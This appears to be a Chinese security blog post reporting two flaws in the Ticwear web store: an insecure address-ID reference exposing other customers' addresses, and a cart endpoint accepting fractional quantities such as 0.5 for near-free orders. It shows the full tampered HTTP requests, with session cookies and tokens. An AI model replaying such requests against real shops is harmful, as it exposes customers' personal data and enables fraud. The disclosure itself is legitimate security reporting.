还是要加强验证呀~

先来说说漏洞

主要是对于地址的引用限制不严格造成。

首先,你要能下个订单,抓到这样的东西 – –

断点设置在 http://store.ticwear.com/api/order/create

然后,看到这里这个关于地址的 ID ,我们改成 1 试试。

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228022700.png

改了之后,继续放行提交,就会看到新订单的页面我们可以看到别人的地址了。

https://www.zhaojin97.cn/wp-content/uploads/2015/12/16B1.tm_.png

然后我们再来看几个。

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228023645.png

然后

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228023704.png

好了好困了就测试一个了。

然后接下来是 0 元订单的问题- -跟上一个比起来也还好。

在加入购物车的时候

拦截 http://store.ticwear.com/api/v1/cart/create 这个断点

                POST http://store.ticwear.com/api/v1/cart/create HTTP/1.1
                Host: store.ticwear.com
                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
                Accept: application/json
                Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
                Accept-Encoding: gzip, deflate
                DNT: 1
                X-Requested-With: XMLHttpRequest
                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                Referer: http://store.ticwear.com/products/p000001
                Content-Length: 80
                Cookie: _ga=GA1.2.80267113.1451191463; Hm_lvt_9903b088357366e6615a9af14b5396fc=1451191463,1451195731,1451208100,1451235136; Hm_lpvt_9903b088357366e6615a9af14b5396fc=1451241659; show_admin_panel=false; _yt_a=af0e4f37-bb24-5298-af1d-70ee312b4c21; _yt_e=http%3A//ticwear.com/%3Fhttp%3A//store.ticwear.com/; a7526_pages=57; a7526_times=1; _homeland_shop_customer_session=30a47693ac0f8170ad25f8e7ca6a06a8f2176ad9d1967bfedc53ee77d43c69a7; checkout_token=42F3908C23E744E1B2E5322AF038216A
                Connection: keep-alive

                variant_id=15229&quantity=1&is_check=true&token=54b64671b98b44bb939e97e7695464de

quantity 可以为任意实数,比如,0.5.

比如,

            POST http://store.ticwear.com/api/v1/cart/create HTTP/1.1
            Host: store.ticwear.com
            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
            Accept: application/json
            Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
            Accept-Encoding: gzip, deflate
            DNT: 1
            X-Requested-With: XMLHttpRequest
            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
            Referer: http://store.ticwear.com/products/p000001
            Content-Length: 82
            Cookie: _ga=GA1.2.80267113.1451191463; Hm_lvt_9903b088357366e6615a9af14b5396fc=1451191463,1451195731,1451208100,1451235136; Hm_lpvt_9903b088357366e6615a9af14b5396fc=1451241659; show_admin_panel=false; _yt_a=af0e4f37-bb24-5298-af1d-70ee312b4c21; _yt_e=http%3A//ticwear.com/%3Fhttp%3A//store.ticwear.com/; a7526_pages=60; a7526_times=1; _homeland_shop_customer_session=30a47693ac0f8170ad25f8e7ca6a06a8f2176ad9d1967bfedc53ee77d43c69a7; checkout_token=42F3908C23E744E1B2E5322AF038216A
            Connection: keep-alive

            variant_id=15229&quantity=0.5&is_check=true&token=54b64671b98b44bb939e97e7695464de

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025126.png

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025231.png

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025250.png

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025306.png

差点点就可以随意重置密码了= =

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228031459.png